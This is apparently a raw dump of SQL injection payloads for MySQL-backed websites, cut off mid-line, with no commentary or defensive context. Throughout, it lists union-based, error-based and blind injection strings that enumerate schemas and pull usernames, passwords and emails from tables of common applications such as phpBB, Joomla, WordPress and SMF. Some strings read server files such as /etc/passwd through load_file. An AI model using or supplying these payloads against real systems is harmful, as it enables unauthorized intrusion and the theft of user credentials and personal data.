1,2,concat(user(),0x20,version(),0x20,database()),4 -- 2' and 1=0 UnIon selECt 1,2,group_concat(schema_name),4,5,6,7,8,9,10,11 from information_schema.schemata -- 2 and 1=0 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database() -- 2 and 1=0 UNION SELECT 1,2,version(),4 -- 2 and 1=0 union select 1,2,version(),4,5-- 2' and 1=0 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38-- 2 and 1=0 union select 1,concat(username,char(58),user_password) from phpbb_users -- 2 and 1=0 union select 1,concat_ws(0x3a3a3a,user(),database(),version())-- 2 and 1=0 UNION SELECT 1,concat_ws(0x3a,database(),user(),version()),3,4,5-- 2 and 1=0 union select 1,concat_ws(0x3a,login,pwd) from _users-- 2 and 1=0 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7 from itt_reviewer -- 2 and 1=0 union select 1,concat_ws(0x3a,version(),database(),user()),3,4 -- 2 and 1=0 union select 1,group_concat(schema_name),3,4,5 from information_schema.schemata-- 2 and 1=0 union select 1,group_concat(schema_name) from information_schema.schemata-- 2 and 1=0 union select 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database() -- 2 and 1=0 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=0x74616967616b685f736f62696e6573746174-- 2' and 1=0 UNION SELECT 1,version() -- 2 and 1=0 union select 1,version(),3,4,5,6,7 -- 2 and 1=0 union select version(),2,3,4,5,6,7,8 -- 2 and 1=1-- 2 and 1=-1 union select 1,concat(0xEBEEE3E8ED202D20,login,0x3C62723E,0xEFE0F0EEEBFC202D20,password,0x3C62723EEFF0E8E2FB202D20,priv),3,4,5,6,7,8,9,10 from tv_admins 2 and 1=222 union select 1,concat_ws(0x3a,user,password,host,file_priv) from mysql.user/* 2 and 1=222 union select 1,concat_ws(0x3a,user(),version(),database()) from mysql.user/* 2 and 1=2 union all select 1,2,3,4,concat(login,char(58),passw),6,7 from admin-- -2 AND 1=2 UNION ALL SELECT 1,2,3,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71)-- 2 and 1=2 union all select 1,group_concat(username,0x3a,password),4,5,6 from auth_users-- -2 and 1=2 union all select concat_ws(0x3a,version(),user(),database(),@@version_compile_os)-- -2 and 1=2 union all select concat_ws(char(58),@@version,user(),database(),@@version_compile_os)-- 2 AND 1=2 UNION SELECT 0,1,2,3,4 -- 2 AND 1=2 UNION SELECT 0,12,3,4 -- 2 AND 1=2 UNION SELECT 0,concat(database(),user(),version()),2,3,4 from jos_users-- 2 AND 1=2 UNION SELECT 0,concat(user(),database(),version()),2,3,4 -- 2 AND 1=2 UNION SELECT 0,concat(username,0x3a,password),2,3,4 from jos_users-- 2 AND 1=2 UNION SELECT 0,concat(user(),version(),database()),2,3,4 from jos_users-- 2 AND 1=2 UNION SELECT 0,concat(version(),database(),user()),2,3,4 -- 2 AND 1=2 UNION SELECT 0,concat(version(),user(),database()),2,3,4 from jos_users-- -2 and 1=2 union select 1,2,3,4,5,6,7,8,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),10,11,12,13,14,15,16,17,18 -- -2 and 1=2 union select 1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5 -- -2 and 1=2 union select 1,2,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -2 and 1=2 union select 1,concat(Username,0x20,Password,0x20,Email) from LoginUsers-- 2' and 1=2 union select 1,concat(version(),0x3a,user(),0x3a,database()),3 -- 2 and 1=2 union select 1,version(),3,4 -- -2 and 1=2 union select concat_ws(0x3a,@@version,user(),database(),@@version_compile_os) -- 2 and 1=3 union select 1,2,3,4,5,6,version(),8,9,10,11-- 2 and 1=if(ascii((select version())=0x34),1,0)-- 2' and 3=substring(version(),1,1)/* 2 and 5=substring(version(),1,1)-- 2 and ascii(substring(user(),1,1))=102f 2 and if(ascii(lower(substring((select concat(userid,0x3a,username,0x3a,passwd) from administration limit 0,1),1,1)))<255,(select 1 from administration),567)=1/* 2 and substring((select 1),1,1)=true 2' and substring(version(),1,1)=4-- 2 and(@@version)=@@version 2 group by 7 -- 2 limit 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -2 or 1=1/* 2 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),rand(0)|0) having min(0)-- 2 or 1 group by concat((select concat(memberName,0x3a3a,passwd,0x3a3a) from smf_members limit 1,1),rand(0)|0) having min(0)-- -2 order select 1/* 2 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),1,63), floor(rand(0)*2)))-- 2 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(concat_ws(0x3a,version(),database(),user()),1,63), FLOOR(RAND(0)*2))) -- 2 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select concat_ws(0x3a,version(),database(),user())),1,64),floor(rand(0)*2))) 2 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(unhex(hex(@@version_compile_os)), 1, 63), floor(rand(0)*2)))-- 2 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(user(), 1, 63), floor(rand(0)*2)))-- 2 union all select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7-- -2 union all select 1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3-- -2 union all select concat_ws(char(58),version(),user(),database(),@@version_compile_os),2,3-- # not sql #2 union elect 1,id,user(),4,5,6,7,8,9,10,11 from articles/* ## -2 UNION SEL -2 UNION SELECT 0,1,2,3,4,5,6,7,concat_ws(0x0b,user(),version(),database()),9,10,11 -- -2 union select 0,1,2,3,concat(username,0x3a,password),5,6 from users -2 UNION SELECT 0,2,3,4,5,6,7,CONCAT_WS(0x0b,Version(),Database(),User()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- -2 UNION SELECT 0,concat_Ws(0x0b,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -2/**/union/**/select/**/0,concat_ws(0x3a,email,username,name,password,usertype,block),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 from jos_users-- 2' union select 1,21,3,table_name from information_schema.tables where table_name not in ('CHARACTER_SETS','COLLATIONS','COLLATION_CHARACTER_SET_APPLICABILITY','COLUMNS','COLUMN_PRIVILEGES','KEY_COLUMN_USAGE','ROUTINES','SCHEMATA','SCHEMA_PRIVILEGES','STATISTICS')/* -2 union select 1,2,3-- -2 union select 1,2,3,4,5 -- -2 union select 1,2,3,4,5,6,7,8-- -2 union select 1,2,3,4,5,6,7,8,9,0,1,2,3-- 2' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* -2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105 from mysql.user/* -2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user(),database()),15,16,17 2 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user()),14,15,16,17,18,19,20,21,22,23,24,25 -- -2 union select 1,2,3,4,5,6,7,8,9,10,11,1,concat_ws(0x3a,password,username),14,15,16,17,18,19,20,21,22 from users-- -2 union select 1,2,3,4,5,6,7,8,9,10,11 from information_schema.tables -- 2 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3,version(),user(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35-- 2 union select 1,2,3,4,5,6,7,8,9,10 from events 2 UNION SELECT 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,name,password),11,12 FROM user LIMIT 1,1/* -2 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,userid,password),11,12,13,14,15,16,17,18,19 from theivoice_admin_user -2' union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15/* -2 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -2 union select 1,2,3,4,5,6,7,TABLE_NAME,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 FROM INFORMATION_SCHEMA.TABLES-- -2 union select 1,2,3,4,5,6,7,version()/* 2 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11-- -2' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13/* 2 union select 1,2,3,4,5,6,concat(database(),0x3a,version(),0x3a,user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -2 union select 1,2,3,4,5,6,concat_ws(0x2f,version(),user(),database()),8,9/* -2 union select 1,2,3,4,5,6,concat_ws(0x3a3a,version(),user(),database()),8,9,10-- 2 union select 1,2,3,4,5,6,concat_ws(0x3a,email,password),8,9,10,11,12 from be_users-- 2 union select 1,2,3,4,5,6,concat_ws(0x3a,name,password),8,email,10,11,12 from fe_users-- -2 union select 1,2,3,4,5,6,group_concat(0x0b,user_name,0x3a,password),8 from users-- 2 union select 1,2,3,4,5,6,password,8,9,10,11 from o_admin-- -2 union select 1,2,3,4,5,concat(email,name,converge_pass_salt,0x27,converge_pass_hash),7,8 from ibf_members m left join ibf_members_converge mc ON (m.email = mc.converge_email)-- -2 union select 1,2,3,4,5,concat_ws(0x3a3a,version(),user(),database()),7-- -2 union select 1,2,3,4,5,concat_ws(0x3a,id,username,pass,email) from users/* -2 union select 1,2,3,4,5,concat_ws(0x3a ,user(),database(),version()),7,8,9,10,11,12,13 -2 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19-- 2 union select 1,2,3,4,5,concat_ws(0x3a,user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 -- -2 union select 1,2,3,4,5,concat_ws(0x3,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33/* -2 union select 1,2,3,4,5 from ga_clients /* -2 union select 1,2,3,4,5 from site_menu -- -2 union select 1,2,3,4,5,id,concat_ws(char(58),FIO,Login,PasWD),8,9,10,11,12,13,14 from accounts/* -2 union select 1,2,3,4,5,load_file('/home/www/htdocs/admin/.htpasswd'),7,8,9,10,11,12/* -2 union select 1,2,3,4,5,TABLE_SCHEMA,COLUMN_NAME,8,9,0,1,2,3,4,5,6,7,8,9 from information_schema.COLUMNS WHERE TABLE_NAME="users" limit 26,1/* -2' union select 1,2,3,4,5,unhex(hex(version())),7,8-- -2 union select 1,2,3,4,5,user() -2 union select 1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15,16/* -2' union select 1,2,3,4,5,version() -- -2 union select 1,2,3,4,5,version(),7,8,9,0,1,2,3,4,5,6,7,8 -- -2 union select 1,2,3,4,concat(0x2a,user(),0x2a,database(),0x2a,version()) 2) UNION SELECT 1,2,3,4,concat(database(),0x3a,user(),0x3a,version()),6,7,8,9,10,11,12,13 -- -2 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10 from dvector_users/* -2 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9,10 from itclinic_users/* -2 union select 1,2,3,4,concat(login,char(3),pas),DATABASE(),7,8,9,10 from people where id= -2 union select 1,2,3,4,concat(name,char(58),password,char(58),email),6,7,8 from members/* 2 union select 1,2,3,4,concat(version(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12,13,14,15,16 limit 1,1 -2 union select 1,2,3,4,concat_ws -2 union select 1,2,3,4,concat_ws(0x0b,version(),user(),database()),6/* -2 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()) -2 union select 1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13-- -2 union select 1,2,3,4,concat_ws(0x3a,id,login,password) from tm_admins-- 2 union select 1,2,3,4,concat_ws(0x3a,login,password),6,7,8,9,10,11,12 from users-- -2 union select 1,2,3,4,CONCAT_WS(0x3a,user(),version(),database()),6,7/* -2 union select 1,2,3,4,concat_ws(0x3a,user(),version(),user,host,password,file_priv,load_file(0x633a2f626f6f742e696e69)),6,7 from mysql.user-- -2 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7-- -2 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -2 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10,11,12-- -2 union select 1,2,3,4,convert(concat(Blurbid,char(58),Blurbname) using latin1),6,7,8,9,10,11,12,13,14,15,16,17 from Blurb/* -2 union select 1,2,3,4,convert(version() using latin1),6,7,8,9,10,11,12,13,14,15,16,17/* -2 union select 1,2,3,4 from settings -- -2 union select 1,2,3,4,group_concat(concat_ws(0x3a,email,password) separator 0x3c62723e),6,7,8,9,10,11,12,13,14 from users-- 2 UnIon selECt 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_schema.tables where table_schema=0x736f6e67737564615f646220-- -2 union select 1,2,3,4,group_concat(username,0x3a,password),6 from user-- -2 union select 1,2,3,4,Password,6,7,8 from admin/* -2 union select 1,2,3,4,table_name,6,7,8,9,10,11,12 from information_schema.tables -- -2 union select 1,2,3,admin_password,5 from admin -- -2 union select 1,2,3,concat(mem_email,0x3a,mem_pass),5,6,7,8,9,10 from member limit 0,1-- -2 union select 1,2,3,concat(name,0x3a,pass) from users/* 2' union select 1,2,3,concat(password),5,6,7,8,9,10 from admin/* -2 union select 1,2,3,concat(table_schema,char(58),table_NAME),5,6,7,8 from INFORMATION_SCHEMA.tables limit 17,1/* -2 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database())/* 2 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7 -- -2 union select 1,2,3,concat(user,0x3e,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user-- -2 union select 1,2,3,concat(user,char(58),pass),5 from user limit 0,1/* 2' union select 1,2,3,concat(username,char(58),password),5,6,7,8,9,10 from admin/* -2 union select 1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,login_id,0x3a,password,0x3a,email),6,7,8,9 from sysadmin-- 2 union select 1,2,3,concat_ws(0x2f,UserName,UserPass,UserEmail),5,6,7,8,9 from users limit 1,1-- -2 union select 1,2,3,concat_ws(0x2f,version(),user(),database()),5/* -2 union select 1,2,3,concat_ws(0x3A3a,table_schema,table_name,column_name),5 from information_schema.columns/* 2 union select 1,2,3,concat_ws(0x3a3a,user_id,user_name,user_password,user_email),5,6 from users-- -2' union select 1,2,3,concat_ws(0x3a3a,user_login,user_passwd),5,6,7,8,9,10,11,12,13 from users/* -2 uNIon sELEct 1,2,3,concat_ws(0x3a3a,usuario,contrasena,tipousuario),5,6,7,8,9 from claves limit 3,3 -- -2 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5 -2 union select 1,2,3,concat_ws(0x3a ,user(),database(),version()),5,6,7 -2 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11-- 2 union select 1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from jos_users where gid=25-- -2 union select 1,2,3,concat_ws(0x3a,user(),@@version_compile_os,version()),5,6,7,8,9,10,11,12,13,14 -- 2' union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6/* -2 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5 -- -2 union select 1,2,3,concat_ws(0x3a,version(),user()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 -- -2 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16-- -2 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17-- -2 union select 1,2,3,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),5,6,7,8/* 2 union select 1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 2 union select 1,2,3,convert(concat(version(),char(58,58),database(),char(58,58),user()) using cp1251),5,6,7,8,9/* 2 union select 1,2,3,group_concat -2 union select 1,2,3,group_concat(0x0b,name,0x3a,password),5,6,7 from users-- -2 union select 1,2,3,group_concat(user(),0x0b,version(),0x0b,database(),0x0b,@@version_compile_os,0x0b),5,6,7,8-- -2 union select 1,2,3,password,5 from users/* -2/**/union/**/select/**/1,2,3,table_name,5,6,7,8,9,10,11,12,13,14 from `information_schema`.tables-- -2 union select 1,2,3,table_name,5,6 from information_schema.tables limit 17,1/* -2 union select 1,2,3,unhex(hex(concat(user,char(58),password))),5 from mysql.user/* 2 union select 1,2,3,unhex(hex(concat_ws(0x3,version(),user(),database())))/* 2 union select 1,2,3,unhex(hex(version())),5/* -2 union select 1,2,3,unhex(hex(version())),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/* -2 union select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18/* -2 union select 1,2,3,user,5,6/**/from/**/mysql.user 2) union select 1,2,3,version(),5,6,7,8,9,10,11 -- -2 union select 1,2,3,version(),database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -2 union select 1,2,3,version(),user(),6,7,8/* -2 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71)/* -2 union select 1,2,aes_decrypt(aes_encrypt(concat(database(),0x3a,version(),0x3a,user()),1),1),4,5,6,7,8-- -2 union select 1,2,AES_DECRYPT(AES_ENCRYPT(concat(id,char(58),email),0x78),0x78),4,5,6 from admin/* -2 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),database(),user()),0x71),0x71),4,5-- 2 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),73),73),4,5,6,7/* -2 UnIon selECt 1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9 from information_schema.tables limit 0,1-- -2 union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(username,0x3a,password,0x0a),0x71),0x71),4 FROM u82696.audio_users-- -2 union select 1,2,column_name,4,5,6,7,8,9 from information_schema.columns/* 2 union select 1,2,concat(0x3,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 limit 1,1/* 2 union select 1,2,concat(0x3,version(),user(),database()) limit 1,1 -2 union select 1,2,concat(char(58,58),version(),char(58,58),database(),char(58,58),user(),char(58,58)),4/* -2 union select 1,2,concat(id,0x3a,name) from admin/* -2 union select 1,2,concat(login,0x3a,passw),4,5,6,7,8,9,10,11 from users/* 2' union select 1,2,concat(login,0x3a,passwd),4,5 from xml_providers/* -2 union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4/* 2 union select 1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8-- -2 union select 1,2,concat(user,0x3a,pass),4,5 from users-- -2 UNION SELECT 1,2,concat(username,0x3a,password) FROM jos_users-- -2 union select 1,2,concat(username,char(58),password),4 from users where user_id=1/* -2 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7-- -2' union select 1,2,concat(version(),0x3a,database()),4/* -2 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- -2 union select 1,2,concat_ws(0x3a3a,id_level,user,password),4 from administrateur_site -- -2 union select 1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from admin /* -2 union select 1,2,concat_ws(0x3a,l_name,l_passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from amgrit.login limit 0,1/* -2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users limit 0,1 -2' union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8 -- -2 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11/* 2 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14-- -2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9 FROM admininfo-- -2 union select 1,2,concat_ws(0x3a,user(),@@version_compile_os,version()),4,5,6,7,8,9,10,11,12 -- 2 union select 1,2,concat_ws(0x3a,user(),version(),database()) -- -2 union select 1,2,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8-- 2 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9-- -2 union select 1,2,concat_ws(0x3a,version(),user(),database()) -- -2 union select 1,2,concat_ws(0x3,version(),user(),database()),4,5,6,7,8/* -2 union select 1,2,concat_ws(0x7c,user(),0x7c,database(),version()),4,5,6,7/* -2 union select 1,2,concat_ws(char(58),version(),user(),database()),4/* 2 union select 1,2,convert(concat_ws(char(58),version(),user(),database()) using latin1),4,5,6,7,8,9,10,11,12,13,14,15,16,17/* -2 union select 1,2,database(),4,5,6,7,8,9,10,11 /* -2 union select 1,2,group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables-- -2 union select 1,2,group_concat(0x0b,username,0x3a3a,password) from sign_user-- -2 union select 1,2,group_concat(email),4,5 from leads -- 2' union select 1,2,group_concat(id,access,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12 from administrators -- -2' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- -2 union select 1,2,option_value,4,5,6 from wordpress.wp_options-- -2 union select 1,2,table_name,4,5,6,7,8,9 from information_schema.tables -- -2 union select 1,2,table_name,4,5,6 from information_schema.tables/* -2 union select 1,2,table_name,4,5 from information_schema.tables/* -2 uNIon sELEct 1,2,tAble_name,4,5 from information_schema.tables -- -2 union/**/select/**/1,2,table_name,4/**/from/**/`information_schema`.tables -- -2 union select 1,2,unhex(hex(user())),4,5-- 2 union select 1,2,unhex(hex(version())),4,5,6,7,8,9,10,11,12,13,14-- -2' union select 1,2,user(),4,5 -- -2 union select 1,2,user(),4,version(),6,7,8,9,0,11,12,13,14/* 2' UNION SELECT 1,2,username,4,pwd,6,7,8,9,10,11,12 FROM ef01pfuser/* -2 union select 1,2,user,password,4,6,7,8 from mysql.user limit 0,1/* -2 union select 1,2,version()-- -2' union select 1,2,version()-- -2 union select 1,2,version(),4,5,6,7,8-- -2 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16/* -2 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* -2 union select 1,2,version(),4,5,6,7,8 from information_schema.tables -2 UNION SELECT 1,2,version(),concat_ws(0x3a ,user(),database()),5 -- -2 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F6574632F706173737764),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -2 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(login,char(58),password,char(58),name,char(58),email),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from chat.chat_admin/* -2 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(name,char(58),password),0x78),0x78),3 from admin/* -2 union select 1,aes_decrypt(aes_encrypt(concat(user,char(58),pass),1),1) from admin 2 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),user_password),0),0),3,4,5,6 from phpbb_users limit 2,1/* -2 union select 1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4 from users/* -2 union select 1,AES_DECRYPT(AES_ENCRYPT(email,0x78),0x78),3,4,5,6 from admin/* 2 union select 1,column_name,3 from information_schema.columns where table_name=0x61646d696e -2 union select 1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4 2 union select 1,concat(0x3,user(),database(),version()),3 limit 1,1 -2 union select 1,concat(database(),0x3a,user(),0x3a,version()),3,4,5/* 2 union select 1,concat(email,char(47),pass,char(47),birthday1,char(47),phone_number,char(47),city),concat(f,char(47),i,char(47),o),concat(preferable_act_types,char(47),future_achiev),5,6 from users-- -2 union select 1,concat(email,char(58),password),3,4,5,6,7,8,9 from users -- -2 union select 1,concat(id,char(58),password,char(58),user,char(58),email,char(58),phone),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from partners limit 321,1/* -2 union select 1,concat(Login,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15 FROM Reviewers/* -2 union select 1,concat(login,char(58),password),3,4,5,6,7,8,9,10 from chatamobile.user/* -2 union select 1,concat(table_name),3,4,5,6 from information_schema.tables /* -2' union select 1,concat(uname,0x3a,passwd),3 from geodis_users-- -2 union select 1,concat(user(),CHAR(58),VERSION()),3,4,5/* -2 union select 1,concat(user(),char(58),version(),char(58),database()) -2 /*!union*/ select 1,CONCAT(userId,0x7c,fName,0x7c,lName,0x7c,0x7c,userName,0x7c,password,0x7c,email),3,4 from promd_admin_users LIMIT 0,1-- -2 union select 1,concat(username,0x3a,user_password),3 from users limit 1,2/* -2 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10,11,12,13-- -2 union select 1,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),3 -- -2 union select 1,concat(version(),char(58,58),database(),char(58,58),user()),3,4,5,6,7/* -2 union select 1,concat_ws(0x20,length(user()),char(ASCII(substring(user(),1,1)),ASCII(substring(user(),2,1)),ASCII(substring(user(),3,1)),ASCII(substring(user(),4,1)),ASCII(substring(user(),5,1)),ASCII(substring(user(),6,1)),ASCII(substring(user(),7,1)),ASCII(substring(user(),8,1)),ASCII(substring(user(),9,1)),ASCII(substring(user(),10,1)),ASCII(substring(user(),11,1)),ASCII(substring(user(),12,1)),ASCII(substring(user(),13,1)),ASCII(substring(user(),14,1)),ASCII(substring(user(),15,1)),ASCII(substring(user(),16,1)),ASCII(substring(user(),17,1))),char(ASCII(substring(database(),1,1)),ASCII(substring(database(),2,1)),ASCII(substring(database(),3,1)),ASCII(substring(database(),4,1)),ASCII(substring(database(),5,1)),ASCII(substring(database(),6,1)),ASCII(substring(database(),7,1)),ASCII(substring(database(),8,1)),ASCII(substring(database(),9,1)),ASCII(substring(database(),10,1)),ASCII(substring(database(),11,1)),ASCII(substring(database(),12,1)),ASCII(substring(database(),13,1)),ASCII(substring(database(),14,1)),ASCII(substring(database(),15,1)),ASCII(substring(database(),16,1)),ASCII(substring(database(),17,1)),ASCII(substring(database(),18,1)),ASCII(substring(database(),19,1)),ASCII(substring(database(),20,1)),ASCII(substring(database(),21,1)) )),3,4,5,6/* -2 union select 1,concat_ws(0x20,user(),database(),version()),3,4,5,6-- -2 union select 1,concat_ws(0x3a3a3a,login,pass),3,4,5 from admin -- 2 union select 1,concat_ws(0x3a3a3a,table_name,column_name),3,4,5,6 from information_schema.columns-- -2 union select 1,concat_ws(0x3a3a,user_id,username,user_password,user_session_page,user_session_topic,user_level,user_login_tries,user_last_login_try),3,4,5 from phpbb_users -- -2 union select 1,concat_ws(0x3a3a,username,password),3,4,5,6 from sitemanager -- -2 union select 1,concat_ws(0x3a3a,version(),user(),database()),3-- -2 union select 1,concat_ws(0x3a,login,password),3 from users limit 1,1-- -2 UNION SELECT 1,concat_ws(0x3a,NAME,EMAIL,REMARK,ADDRESS,LOGIN,PASSWORD,STATUS),3 FROM user LIMIT 54,1 -- -2 union select 1,concat_ws(0x3a,table_name,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 from information_schema.tables/* -2 union select 1,concat_ws(0x3a ,user(),database(),version()),3 -2 union select 1,concat_ws(0x3a ,user(),database(),version()),3,4 -2 UNION SELECT 1,concat_ws(0x3a,user_name,password),3,4 from admin-- -2 union select 1,concat_ws(0x3a,username,password),3,4 from jos_users -- -2 union select 1,concat_ws(0x3a,username,password),3 from main.usersadmin-- -2 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 2 UNION SELECT 1,CONCAT_WS(0x3a,user(),version(),database()),3,4,5,6,7,8,9 LIMIT 1,1/* -2 union select 